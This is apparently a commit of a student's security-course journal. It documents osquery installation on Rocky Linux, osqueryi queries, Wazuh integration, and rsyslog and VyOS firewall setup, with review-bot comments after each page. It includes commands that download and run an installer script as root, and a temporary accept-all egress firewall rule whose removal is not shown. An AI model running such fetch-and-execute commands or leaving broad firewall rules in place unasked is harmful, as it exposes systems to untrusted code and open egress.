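Review bot: the Notes item says the workstation reaches web01 over HTTP "through firewall rules" but names none; reference the firewall name and rule number on the VyOS router that allows LAN to DMZ port 80 so the claim can be checked against the running config.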


@ -0,0 +1,27 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Research
Osquery is an open-source OS instrumentation framework that uses SQL-like syntax to query the OS as if it were a relational database. It was created by Facebook(Meta) in 2014.
## Features
- **Cross-platform**: macOS, Linux, FreeBSD, and Windows
- **Data collection**: running processes, user logins, kernel modules, network connections, browser plugins, hardware events, file hashes, and more
- **SQL-based queries**: Users can write SQL queries to explore data across all operating systems and infrastructure
- **Query packs**: Pre-built collections of queries for specific tasks like incident response, vulnerability management, or compliance monitoring
## Components
1. [**Osqueryi**](03_client_app.md): An interactive console shell for running ad-hoc queries and exploring the system
2. [**Osqueryd**](02_install_rocky.md): A daemon that schedules queries and monitors system changes
> [!Warning]
> Osquery generates approximately 110MB of data per endpoint per day. This requires careful consideration of storage and management, especially for large-scale deployments.
Sources:
- https://www.uptycs.com/blog/threat-research-report-team/osquery-guide
- https://rearc.io/blog/osquery-introduction
- https://www.rapid7.com/blog/post/2016/05/09/introduction-to-osquery-for-threat-detection-dfir/
___
|[<<<<](README.md)|[>>>>](02_install_rocky.md)|
|-|-|
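Review bot: the warning's "approximately 110MB of data per endpoint per day" is the one quantitative claim on the page and it is not tied to any of the three Sources listed below it; cite the one it comes from (or the osquery version and query pack it was measured with), since this number drives the storage planning the warning asks for. Two style points: "Facebook(Meta)" is missing a space, and the Features bullet lists FreeBSD while the Conclusion page in this commit lists only Linux, macOS and Windows; the two pages should agree.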


@ -0,0 +1,54 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Install osquery on Rocky Linux (web01)
## Installation
### DMZ-to-WAN temporary firewall rule
Add a temporary rule for software updates that we either delete, disable or discard when complete
```bash
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
```
### Install via yum repository
- (current version: 15.5.0) -- [source](https://osquery.io/downloads/official/5.15.0)
```bash
curl -L https://pkg.osquery.io/rpm/GPG | sudo tee /etc/pki/rpm-gpg/RPM-GPG-KEY-osquery
sudo yum install yum-utils -y
sudo yum-config-manager --add-repo https://pkg.osquery.io/rpm/osquery-s3-rpm.repo
sudo yum-config-manager --enable osquery-s3-rpm-repo
sudo yum install osquery -y
```
## Configuration
> [!Warning]
> Linux systems running journald will collect logging data originating from the kernel audit subsystem (something that osquery enables) from several sources, including audit records. To avoid performance problems on busy boxes (specially when osquery event tables are enabled), it is recommended to mask audit logs from entering the journal with the following command
> ```bash
> systemctl mask --now systemd-journald-audit.socket
> ```
> -- [source](https://osquery.readthedocs.io/en/latest/installation/install-linux/)
The `/etc/init.d/osqueryd` script does not automatically start the daemon until a configuration file is created. This is the command to copy the existing example config file into your working config files directory, this file may need further configuration.
```bash
sudo cp /opt/osquery/share/osquery/osquery.example.conf /etc/osquery/osquery.conf
```
## Running osquery
### Standalone/Client App (osqueryi)
To start a standalone osquery use: `osqueryi`. This does not need an osquery server or service. [osqueryi page](03_client_app.md)
### Daemon Service (osqueryd)
```bash
sudo systemctl enable osqueryd
sudo systemctl start osqueryd
```
> [!Note]
> The interactive shell and daemon do NOT communicate!
___
Source: https://documentation.wazuh.com/current/user-manual/capabilities/system-inventory/osquery.html
|[<<<<](01_research.md)|[>>>>](03_client_app.md)|
|-|-|
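Review bot: the temporary rule `set firewall name DMZ-to-WAN rule 999 action accept` / `set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3` is introduced with the promise that it is deleted, disabled or discarded afterwards, but the hunk never shows how; add the matching `delete firewall name DMZ-to-WAN rule 999` followed by `commit` and `save` (per the VyOS page in this commit) at the end of the Installation section so the DMZ web server does not keep unrestricted WAN egress. Also: the version bullet reads "current version: 15.5.0" while its link points at 5.15.0; `curl -L https://pkg.osquery.io/rpm/GPG | sudo tee ...` installs a package-signing key straight from the network, so record the expected key fingerprint beside it for the reader to compare; and the Configuration text refers to `/etc/init.d/osqueryd` while the Daemon Service section uses `systemctl`, so say which applies on Rocky.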


@ -0,0 +1,59 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# osquery Client Application (osqueryi)
`osqueryi` is an interactive shell for osquery that uses SQL-like queries to gather system information. It allows you to query various aspects of an operating system as if they were tables in a database.
## Common queries:
Inspect system processes:
```sql
osquery> SELECT name, path, pid FROM processes WHERE name = 'httpd';
+-------+-----------------+-------+
| name | path | pid |
+-------+-----------------+-------+
| httpd | /usr/sbin/httpd | 82243 |
| httpd | /usr/sbin/httpd | 86173 |
| httpd | /usr/sbin/httpd | 86174 |
| httpd | /usr/sbin/httpd | 86175 |
| httpd | /usr/sbin/httpd | 86176 |
+-------+-----------------+-------+
```
List installed packages:
```sql
osquery> SELECT name, version FROM rpm_packages;
+-------------------------------+------------+
| name | version |
+-------------------------------+------------+
| NetworkManager | 1.36.0 |
| NetworkManager-config-server | 1.36.0 |
| NetworkManager-libnm | 1.36.0 |
| NetworkManager-team | 1.36.0 |
| NetworkManager-tui | 1.36.0 |
| acl | 2.2.53 |
| adcli | 0.8.2 |
| alsa-sof-firmware | 1.9.3 |
| apr | 1.6.3 |
| apr-util | 1.6.1 |
...
```
Check listening network ports:
```sql
osquery> SELECT pid, address, port FROM listening_ports;
+-------+-----------+-------+
| pid | address | port |
+-------+-----------+-------+
| 1101 | 0.0.0.0 | 22 |
| 86176 | :: | 80 |
| 1101 | :: | 22 |
| 34468 | 0.0.0.0 | 51361 |
| 942 | 127.0.0.1 | 323 |
| 942 | ::1 | 323 |
| 1068 | :: | 58 |
| 924 | | 0 |
| 924 | | 0 |
...
```
___
|[<<<<](02_install_rocky.md)|[>>>>](04_wazuh_integration.md)|
|-|-|
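Review bot: the listening_ports query returns only a pid, so the reader has to cross-reference the processes output by hand to learn that pid 86176 on port 80 is httpd; since the page already uses both tables, add a joined example such as `SELECT p.name, lp.address, lp.port FROM listening_ports lp JOIN processes p ON lp.pid = p.pid;`, which is the form actually useful for spotting an unexpected listener. Also the `osquery>` prompt and the result tables sit inside the `sql` fences, so the blocks are not copy-pasteable; put the prompt outside the fence or label the fences as console output.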


@ -0,0 +1,107 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Wazuh Integration
## Requirements
- Wazuh manager installed and configured on the wazuh server
- Wazuh agent installed and connected on WEB01
- osquery already installed on WEB01 ([installation guide](02_install_rocky.md))
- root privileges
## Configure osquery on web01
### on WEB01
- create osquery configuration file. if already created with defaults, edit it
```json
> sudo nano /etc/osquery/osquery.conf
{
"options": {
"logger_path": "/var/log/osquery",
"disable_logging": "false",
"schedule_splay_percent": "10",
"utc": "true"
},
"schedule": {
"system_info": {
"query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
"interval": 300
},
"processes": {
"query": "SELECT pid, name, path, cmdline FROM processes;",
"interval": 300
},
"logged_in_users": {
"query": "SELECT user, host, time FROM logged_in_users;",
"interval": 300
},
"firewall_status": {
"query": "SELECT * FROM shell WHERE command = 'firewall-cmd --state';",
"interval": 300
}
},
...
```
- create log directories with correct permissions for storing osquery results
```bash
sudo mkdir -p /var/log/osquery
sudo chown -R root:root /var/log/osquery
sudo chmod -R 755 /var/log/osquery
```
- restart osqueryd
```bash
sudo systemctl restart osqueryd
sudo systemctl status osqueryd
```
## Configure WEB01 -> Wazuh integration
### On WEB01
- configure Wazuh agent to monitor osquery logs
```xml
> sudo nano /var/ossec/etc/ossec.conf
# Add these blocks inside the <ossec_config> section
# make sure this wodle is NOT disabled, as this service is disabled by default
<wodle name="osquery">
<disabled>no</disabled>
<run_daemon>yes</run_daemon>
<log_path>/var/log/osquery/osqueryd.results.log</log_path>
<config_path>/etc/osquery/osquery.conf</config_path>
<add_labels>yes</add_labels>
</wodle>
<localfile>
<log_format>json</log_format>
<location>/var/log/osquery/osqueryd.results.log</location>
</localfile>
```
- restart wazuh agent
```bash
sudo systemctl restart wazuh-agent
sudo systemctl status wazuh-agent
```
## Validation
### on WEB01
- Run a manual query to generate an immediate log entry
```
sudo osqueryi --json "SELECT * FROM processes LIMIT 5;" > /var/log/osquery/osqueryd.results.log
```
- Check if Wazuh detected it
```
sudo tail -f /var/ossec/logs/ossec.log
```
### on Wazuh Server
- Go to Modules Menu -> Security Events -> Events
- In left panel, add rule.groups: osquery
![image](../../assets/54a8264b-ffac-4f98-be7d-5d1abce24233.png)
___
|[<<<<](03_client_app.md)|[>>>>](05_demonstration.md)|
|-|-|
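Review bot: the validation step `sudo osqueryi --json "SELECT * FROM processes LIMIT 5;" > /var/log/osquery/osqueryd.results.log` truncates the very file that osqueryd writes and the Wazuh agent tails, discarding the scheduled results collected so far, and osqueryi's JSON (one array) is not the one-event-per-line format the daemon produces; either wait for the 300-second schedule to fire or append (`>>`) a single-line event rather than overwriting. Related points in the same hunk: `<run_daemon>yes</run_daemon>` tells the wodle to launch osqueryd itself while the page also starts osqueryd through systemd, so one of the two should go or `run_daemon` should be `no`; the `<localfile>` block reads the same `osqueryd.results.log` the wodle already consumes, so every event is ingested twice; the `#` comment lines inside the `xml` fence are not XML comments and will break `ossec.conf` if pasted, use `<!-- -->`; the `json` fence contains the `> sudo nano` command and a trailing `...`, so it is not valid JSON as shown; and `shell` does not appear in the standard osquery table set, so check that the installed build provides it before relying on `firewall_status`. Lastly, `chmod -R 755 /var/log/osquery` leaves process listings and logged-in users world-readable; restrict the directory to the owner and the agent's group instead.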


@ -0,0 +1,7 @@
|[HOME](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/README.md)|[RESEARCH](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/01_research.md)|[INSTALLATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/02_install_rocky.md)|[CLIENT APP](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/03_client_app.md)|[INTEGRATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/04_wazuh_integration.md)|[DEMONSTRATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/05_demonstration.md)|[CONCLUSION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/06_conclusion.md)|
|-|-|-|-|-|-|-|
# Demonstration
___
|[<<<<](04_wazuh_integration.md)|[>>>>](06_conclusion.md)|
|-|-|
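Review bot: the Demonstration page has only a heading, yet the README item for it asks for an end-to-end walkthrough of an event picked up by osquery and arriving in Wazuh; at minimum link the demonstration video from the README here and list the steps it shows (the triggering action, the schedule entry in `osquery.conf` that catches it, and the `rule.groups: osquery` filter in Security Events on the Wazuh server).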


@ -0,0 +1,19 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Conclusion
## Pros
- open source
- lightweight
- works on Linux, macOS, and Windows
## Cons
- stores current system state, which means it doesn't store historical data
## Overview
In conclusion, the OSQuery project demonstrates the potential of integrating OSQuery with Wazuh for enhanced security monitoring. OSQuery provides a powerful tool for querying and monitoring system data, while Wazuh offers robust endpoint detection and response capabilities. The integration of these tools allows for real-time event detection and analysis, offering significant benefits in terms of security visibility and incident response. However, considerations regarding complexity and resource requirements are important when implementing such a system. Overall, the integration of OSQuery with Wazuh presents a promising approach to strengthening corporate security infrastructure.
___
|[<<<<](05_demonstration.md)||
|-|-|
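Review bot: the Cons bullet "stores current system state, which means it doesn't store historical data" is contradicted by the Integration page in this commit, where scheduled queries write results to `/var/log/osquery/osqueryd.results.log` every 300 seconds and Wazuh indexes them; qualify it as "a single osqueryi query returns only current state; history comes from scheduled queries and the SIEM". Also the Pros list names Linux, macOS and Windows while the Research page adds FreeBSD, and the Overview's "considerations regarding complexity and resource requirements" would carry more weight tied to the 110MB per endpoint per day figure and the 2 CPU / 4 GB Wazuh minimum that other pages in this commit mention.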


@ -0,0 +1,23 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
Charlotte Croce, Andrei Gorlitsky, Benjamin Tyler
# Project 1 -OSQuery
🚀 Your security engineering technical lead has asked you to investigate a potential security tool called [OSQuery](https://github.com/osquery/osquery). They have asked that you be prepared to demonstrate the application itself and its integration into the corporate EDR platform (wazuh). You are expected to demo your results to the full security engineering team in one week.
## Demonstration Video
Google Drive link: https://drive.google.com/file/d/1TmDQrPufHJVOyXyVaR0a5f4StchSyOn2/view?usp=drive_link
## Documentation Contents
- [RESEARCH:](01_research.md) Conduct high level research on OSQuery and explain what it does at a high level
- [INSTALLATION:](02_install_rocky.md) Install OSQuery on either web01 (rocky) or wks01 (windows 10)
- [CLIENT APP:](03_client_app.md) Investigate and demonstrate some of the features of the OSQuery client application
- [INTEGRATION:](04_wazuh_integration.md) Integrate OSQuery with Wazuh
- [DEMONSTRATION:](05_demonstration.md) Develop an end to end demonstration that shows the triggering of an event that is picked up by OSQuery and how that event eventually makes it to Wazuh.
- [CONCLUSION:](06_conclusion.md) Conclude by discussing any pros and cons of this tool and integration.
___
||[>>>>](01_research.md)|
|-|-|


@ -0,0 +1,38 @@
# rsyslog configuration
an open-source software used on linux computer systems for forwarding log messages through a network. \
`sudo apt/yum install rsyslog`
## server
### open ports 514 on server
```
sudo firewall-cmd --add-port=514/tcp --permament
sudo firewall-cmd --add-port=514/udp --permament
sudo firewall-cmd --reload
```
### enable log input modules
the `/etc/rsyslog.conf` file needs to be modified to receive syslog messages over ports 514 tcp and udp. Uncomment the appropriate lines (see below) and restart the rsyslog service. \
![image](../assets/48994d9b-0f17-4626-ab9d-985d37c5e506.png)
### monitor for incoming logs
- `tail -f /var/log/messages`
## client
### configure log forwarding to server
- rsyslog needs to be installed on client as well: `sudo yum install rsyslog`
- create the following file: `/etc/rsyslog.d/sec350.conf`, add the line `user.notice @172.16.50.5`, and restart rsyslog
![image](../assets/143d58a5-5713-4425-b1d5-d8f9dcf63cf0.png)
> **_NOTE:_** the line in sec350.conf means: \
> user = syslog facility \
> notice = syslog priority \
> @=UDP, @@ means TCP, so we are only going to send UDP \
> 172.16.50.5 = Remote Syslog Server
#### loggin authpriv messages on linux systems
![image](../assets/77c2b1f5-6aa2-4e76-8db6-59feb31cb4fb.png)
### create test log
- `logger -t test TESTLOG123`
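Review bot: `--permament` in both `firewall-cmd` lines is a typo for `--permanent`; as written the commands fail and the 514 rules are never persisted. Also, the server opens 514/tcp and 514/udp but the client section's own note says a single `@` sends UDP only; either forward the authpriv stream with `@@` or say why the TCP port is opened. The input-module and authpriv screenshots carry the only copy of the actual config lines; put them in fenced text so they are searchable and copyable.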


@ -0,0 +1,63 @@
# VyOS
an open source networking OS based on Debian \
https://docs.vyos.io/en/sagitta/
## Overview
- VyOS has two modes: operational and configuration mode
- The operational mode is used to view the system status and run commands (command prompt displays `$`)
- the configuration mode is used to modify the system configuration (command prompt displays `#`)
## Commands
### Basics
- enter configuration mode from operational mode: `configure`
- exit configuration mode: `exit`
- commit current set of changes `commit`
- save current changes: `save`
- `commit`, followed by `save` will save configuration changes
### Change Password
```
set system login user vyos authentication plaintext-password [password]
```
### Set Hostname
```
set system host-name fw01-charlotte
```
### Interfaces
- set IP: `set interfaces ethernet ethX address 172.16.50.X./24`
- add description: `set interfaces ethernet ethX description SEC350-WAN`
- `show interfaces`
### Gateway and DNS Server
- create default route (gateway): `set protocols static route 0.0.0.0/0 next-hop 10.0.17.2`
- set DNS server: `set system name-server 10.0.17.2`
### NAT
```
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
show nat source translations
```
### DNS Forwarding
```
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
set service dns forwarding system
```
### Forward authentication events from vyos to a remote syslog server
```
set system syslog host 172.16.50.5 facility authpriv level info
```
### Export configuration
```
show configuration commands | grep -v "syslog global\|ntp\|login\|console\|config\|hw-id\|loopback\|conntrack"
```
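Review bot: `set interfaces ethernet ethX address 172.16.50.X./24` has a stray dot before the prefix length. Also, `set system login user vyos authentication plaintext-password [password]` leaves the password in the shell history and in this journal; VyOS also accepts `encrypted-password` with a pre-hashed value, and the Export configuration command already strips `login` from the exported config for the same reason, so the two should be consistent.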


@ -0,0 +1,28 @@
# Wazuh
## Installing Server
- run the following command: `curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i`
- remember to save the auto-generated password
### Ports to open on firewall
- **1514/TCP** for agent communication.
- **1515/TCP** for enrollment via automatic agent request.
- **55000/TCP** for enrollment via Wazuh server API.
## Installing Agents
- Wazuh dropdown > Agents > enter agent configurations
- run the generated command on the remote system to install the agent:
- start agent service:
```
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## Agent directory structure
Wazuh agent files are stored in /var/ossec/. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring
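Review bot: the Agent directory structure list duplicates, line for line, the same section of the Wazuh Server Configuration page in this commit, and the install command and port list repeat as well; keep one copy and link to it so the two do not drift. Also `run the generated command on the remote system to install the agent:` ends in a colon with nothing after it, so the command (or a pointer to the WEB01 page where it appears) is missing.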